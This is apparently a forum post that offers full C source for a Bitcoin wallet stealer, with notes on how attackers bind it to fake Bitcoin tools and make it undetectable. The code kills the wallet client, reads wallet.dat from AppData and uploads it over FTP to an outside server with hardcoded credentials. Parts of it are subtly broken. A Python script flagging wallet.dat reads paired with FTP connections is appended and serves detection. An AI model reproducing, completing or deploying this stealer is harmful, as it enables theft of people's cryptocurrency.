Bitcoin Wallet Stealer Info + Source Code


The process is simple: this small C program looks in your computer's AppData folder, and if it finds the wallet.dat file, it uploads it to the attacker's server over FTP (File Transfer Protocol). The stealer itself is a virus, a hacking tool, malware, or whatever you want to call it. Attackers take the same source and add features such as infection spreading and USB spreading, which make it more dangerous. Same meaning, different names.

How do attackers spread this stealer to Bitcoin users, and how do they know I have Bitcoin?
Well, it's not so hard: they bind the virus to a program related to Bitcoin, such as a "Bitcoin Stealer Maker" itself, and when someone downloads it, they lose their wallet.

The point is that you should worry about your wallet. A virus can infect you one way or another, whether you are protected or not. People will always find a way to make the Bitcoin virus FUD ("Fully Undetectable"), which makes it virtually impossible to notice.


-CODE-

#include <windows.h>
        #include <tlhelp32.h>
        #include <tchar.h>
     
        #include <wininet.h>
        #include <ctime>
        #include <iostream>
        #pragma comment(lib, "wininet")
     
        void killprocess()
        { 
                HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
                // Get the process list snapshot.
                PROCESSENTRY32 ProcessEntry = { 0 };
                // Initialize the process entry structure.
                ProcessEntry.dwSize = sizeof( ProcessEntry );
                // Get the first process info
                BOOL Return = FALSE;
                Return = Process32First( hProcessSnapShot,&ProcessEntry );
                int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
                if (value==0)
                {
                        HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
                        //Open Process to terminate
                        TerminateProcess(hProcess,0);
                        CloseHandle(hProcess); //Close Handle }
                }
                while( Process32Next( hProcessSnapShot, &ProcessEntry ));
                CloseHandle( hProcessSnapShot );
        }
     
        int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
        {
                killprocess();
                Sleep(40000);
                srand((unsigned)time(NULL));                    // we get time to use for random seed
                int seedone=rand();                                             // seed one
                int seedtwo=rand()*3;                                   // seed two times 3
                int seedboth = seedone + seedtwo;               // combine seeds to ensure random int
                // now we need to convert int to char
                char randomseed[99];                                    // make randomseed buffer at 99 to prevent overflow
            itoa(seedboth,randomseed,10);                       // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
                // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
           
                char* appdata = getenv("APPDATA");              //Gets %Appdata% path
                char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal
     
                //ftp connection
                HINTERNET hInternet;
                HINTERNET hFtpSession;
                hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
                hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass
     
                FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
                FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
     
                InternetCloseHandle(hFtpSession);
                InternetCloseHandle(hInternet);
           
                return 0;
        }




Full credit goes to: *Code 127.0.0.1*
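The behaviour in the source above gives a defender something concrete to look for: a process that is not the wallet client reading `%APPDATA%\Bitcoin\wallet.dat` and opening an FTP connection. The detection logic below is an added example, not part of the original post; the event records, field names, allowlist and time window are assumptions, and the sample events are constructed.

```python
from collections import defaultdict

WALLET_SUFFIX = "\\bitcoin\\wallet.dat"   # path tail the stealer targets
WALLET_APPS = {"bitcoin.exe", "bitcoin-qt.exe", "bitcoind.exe"}  # assumed allowlist
FTP_PORT = 21

def find_wallet_exfil(events, window=120):
    """Return sorted (pid, image) pairs where a non-wallet process read
    wallet.dat and made an FTP connection within `window` seconds."""
    reads, ftp = defaultdict(list), defaultdict(list)
    for ev in events:
        image = ev["image"].lower()
        key = (ev["pid"], image)
        exe = image.rsplit("\\", 1)[-1]
        if ev["type"] == "file_read":
            if ev["path"].lower().endswith(WALLET_SUFFIX) and exe not in WALLET_APPS:
                reads[key].append(ev["ts"])
        elif ev["type"] == "net_connect" and ev["dport"] == FTP_PORT:
            ftp[key].append(ev["ts"])
    # The source above connects first and reads the file during the upload,
    # so the match is order-independent (absolute time difference).
    return sorted(
        key for key, times in reads.items()
        if any(abs(r - c) <= window for r in times for c in ftp.get(key, []))
    )

# Constructed sample telemetry (hypothetical schema, timestamps in seconds).
WALLET = r"C:\Users\alice\AppData\Roaming\Bitcoin\wallet.dat"
SAMPLE_EVENTS = [
    {"ts": 100, "type": "file_read", "pid": 4100, "path": WALLET,
     "image": r"C:\Program Files\Bitcoin\bitcoin-qt.exe"},      # wallet client
    {"ts": 200, "type": "net_connect", "pid": 5200, "dport": 21,
     "image": r"C:\Users\alice\Downloads\maker.exe"},           # FTP first
    {"ts": 201, "type": "file_read", "pid": 5200, "path": WALLET,
     "image": r"C:\Users\alice\Downloads\maker.exe"},           # then wallet read
    {"ts": 300, "type": "net_connect", "pid": 6300, "dport": 21,
     "image": r"C:\Tools\ftpclient.exe"},                       # FTP, no wallet
    {"ts": 900, "type": "file_read", "pid": 7400, "path": WALLET,
     "image": r"C:\Tools\backup.exe"},                          # wallet, no FTP
]

if __name__ == "__main__":
    for pid, image in find_wallet_exfil(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} image={image}: wallet.dat read + FTP")
```
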
